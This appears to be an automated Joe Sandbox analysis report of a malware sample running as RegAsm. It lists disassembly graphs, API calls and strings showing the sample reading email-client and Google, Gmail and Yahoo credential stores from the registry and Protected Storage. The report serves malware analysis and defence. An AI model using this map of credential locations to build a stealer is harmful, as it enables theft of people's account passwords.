                                                                                                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$FreeLoad_mbscpy
                                                                                                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                              • API String ID: 3151552205-317895162
                                                                                                                                              • Opcode ID: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                              • Opcode Fuzzy Hash: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 262 444c4a-444c66 call 444e38 GetModuleHandleA 265 444c87-444c8a 262->265 266 444c68-444c73 262->266 268 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 265->268 266->265 267 444c75-444c7e 266->267 269 444c80-444c85 267->269 270 444c9f-444ca3 267->270 277 444d02-444d0d __setusermatherr 268->277 278 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 268->278 269->265 272 444c8c-444c93 269->272 270->265 273 444ca5-444ca7 270->273 272->265 275 444c95-444c9d 272->275 276 444cad-444cb0 273->276 275->276 276->268 277->278 281 444da4-444da7 278->281 282 444d6a-444d72 278->282 285 444d81-444d85 281->285 286 444da9-444dad 281->286 283 444d74-444d76 282->283 284 444d78-444d7b 282->284 283->282 283->284 284->285 287 444d7d-444d7e 284->287 288 444d87-444d89 285->288 289 444d8b-444d9c GetStartupInfoA 285->289 286->281 287->285 288->287 288->289 290 444d9e-444da2 289->290 291 444daf-444db1 289->291 292 444db2-444dc6 GetModuleHandleA call 40cf44 290->292 291->292 295 444dcf-444e0f _cexit call 444e71 292->295 296 444dc8-444dc9 exit 292->296 296->295
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                              • String ID: 2t
                                                                                                                                              • API String ID: 3662548030-3527913779
                                                                                                                                              • Opcode ID: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                              • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                                                              • Opcode Fuzzy Hash: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                              • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 300 40fb00-40fb35 call 44b090 RegOpenKeyExA 303 40fc37-40fc3d 300->303 304 40fb3b-40fb4f 300->304 306 40fb55-40fb7e RegQueryValueExA 304->306 307 40fc2d-40fc31 RegCloseKey 304->307 308 40fc23-40fc27 RegCloseKey 306->308 309 40fb84-40fb93 call 404734 306->309 307->303 308->307 309->308 312 40fb99-40fbd1 call 4047a5 309->312 312->308 315 40fbd3-40fbdb 312->315 316 40fc19-40fc1d LocalFree 315->316 317 40fbdd-40fc14 memcpy * 2 call 40f802 315->317 316->308 317->316
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                              • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$memcpy$EnumFreeLibraryLoadLocalOpenQueryValuememset
                                                                                                                                              • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                                                                              • API String ID: 547501411-2409096184
                                                                                                                                              • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                              • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 319 402c5d-402c81 call 410a9c 322 402da5-402db0 319->322 323 402c87-402cb7 memset call 410b62 319->323 326 402d9c-402d9f RegCloseKey 323->326 327 402cbd-402cbf 323->327 326->322 328 402cc4-402d2d call 410b1e memset sprintf call 410a9c 327->328 333 402d3a-402d6b sprintf call 410a9c 328->333 334 402d2f-402d35 call 402bd1 328->334 338 402d7a-402d8a call 410b62 333->338 339 402d6d-402d75 call 402bd1 333->339 334->333 342 402d8f-402d94 338->342 339->338 342->328 343 402d9a-402d9b 342->343 343->326
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                              • memset.MSVCRT ref: 00402C9D
                                                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                              • memset.MSVCRT ref: 00402CF7
                                                                                                                                              • sprintf.MSVCRT ref: 00402D10
                                                                                                                                              • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                              • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                              • API String ID: 1831126014-3814494228
                                                                                                                                              • Opcode ID: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                              • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                              • Opcode Fuzzy Hash: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                              • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0044430B
                                                                                                                                                • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                              • memset.MSVCRT ref: 00444379
                                                                                                                                              • memset.MSVCRT ref: 00444394
                                                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                              • strlen.MSVCRT ref: 004443DB
                                                                                                                                              • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                              Strings
                                                                                                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                              • Store Root, xrefs: 004443A5
                                                                                                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                                                                                                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                              • API String ID: 1502082548-2578778931
                                                                                                                                              • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                              • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 365 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 370 40f5c3-40f5ea RegQueryValueExA 365->370 371 40f6d9-40f6df 365->371 372 40f6d0-40f6d3 RegCloseKey 370->372 373 40f5f0-40f5f4 370->373 372->371 373->372 374 40f5fa-40f604 373->374 375 40f606-40f618 call 40466b call 404734 374->375 376 40f677 374->376 385 40f66a-40f675 call 404785 375->385 386 40f61a-40f63e call 4047a5 375->386 377 40f67a-40f67d 376->377 377->372 379 40f67f-40f6bf call 4012ee RegQueryValueExA 377->379 379->372 387 40f6c1-40f6cf 379->387 385->377 386->385 392 40f640-40f643 386->392 387->372 393 40f661-40f664 LocalFree 392->393 394 40f645-40f65a memcpy 392->394 393->385 394->393
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040F567
                                                                                                                                              • memset.MSVCRT ref: 0040F57F
                                                                                                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                              • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: QueryValuememset$CloseFreeLibraryLoadLocalOpen_mbscpy_mbsnbcatmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4271961475-3916222277
                                                                                                                                              • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                              • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                              • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                              • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 395 4037ca-40381c memset * 2 call 444551 398 4038e2-4038e5 395->398 399 403822-403882 call 4021b6 call 406f06 * 2 strchr 395->399 406 403884-403895 _mbscpy 399->406 407 403897-4038a2 strlen 399->407 408 4038bf-4038dd _mbscpy call 4023e5 406->408 407->408 409 4038a4-4038bc sprintf 407->409 408->398 409->408
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004037EB
                                                                                                                                              • memset.MSVCRT ref: 004037FF
                                                                                                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                              • strchr.MSVCRT ref: 0040386E
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                              • strlen.MSVCRT ref: 00403897
                                                                                                                                              • sprintf.MSVCRT ref: 004038B7
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                              • String ID: %s@yahoo.com
                                                                                                                                              • API String ID: 317221925-3288273942
                                                                                                                                              • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                              • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                              • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                              • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 411 4036e5-4036f5 412 4037c6-4037c7 411->412 413 4036fb-403709 call 410863 411->413 415 40370e-403710 413->415 416 4037c5 415->416 417 403716-40372a strchr 415->417 416->412 417->416 418 403730-403787 call 4021b6 _mbscpy * 2 strlen 417->418 421 4037a4-4037c0 _mbscpy call 4023e5 418->421 422 403789-4037a1 sprintf 418->422 421->416 422->421
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                              • strchr.MSVCRT ref: 0040371F
                                                                                                                                              • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                              • strlen.MSVCRT ref: 00403778
                                                                                                                                              • sprintf.MSVCRT ref: 0040379C
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                              • String ID: %s@gmail.com
                                                                                                                                              • API String ID: 3261640601-4097000612
                                                                                                                                              • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                              • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                              • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                              • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 424 404a99-404ac2 LoadLibraryA 425 404ac4-404ad2 424->425 426 404aec-404af4 424->426 430 404ad4-404ad8 425->430 431 404add-404ae6 FreeLibrary 425->431 429 404af5-404afa 426->429 433 404b13-404b17 429->433 434 404afc-404b12 MessageBoxA 429->434 435 404adb 430->435 431->426 432 404ae8-404aea 431->432 432->429 435->431
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$FreeLoadMessage
                                                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                              • API String ID: 3897320386-317687271
                                                                                                                                              • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                              • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                              • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                              • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 436 4034e4-403544 memset * 2 call 410b1e 439 403580-403582 436->439 440 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 436->440 440->439
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00403504
                                                                                                                                              • memset.MSVCRT ref: 0040351A
                                                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                              • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                              • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                              • API String ID: 3071782539-966475738
                                                                                                                                              • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                              • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 445 410863-41088b UuidFromStringA * 2 446 4108dd 445->446 447 41088d-41088f 445->447 448 4108df-4108e2 446->448 447->446 449 410891-4108aa call 410827 447->449 451 4108af-4108b1 449->451 451->446 452 4108b3-4108b9 451->452 453 4108bb-4108bd 452->453 454 4108be-4108db memcpy CoTaskMemFree 452->454 453->454 454->448
                                                                                                                                              APIs
                                                                                                                                              • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                              • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                              Strings
                                                                                                                                              • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                              • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                              • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                              • API String ID: 1640410171-3316789007
                                                                                                                                              • Opcode ID: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                              • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                              • Opcode Fuzzy Hash: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                              • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                              • CloseHandle.KERNELBASE(?), ref: 00444206
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
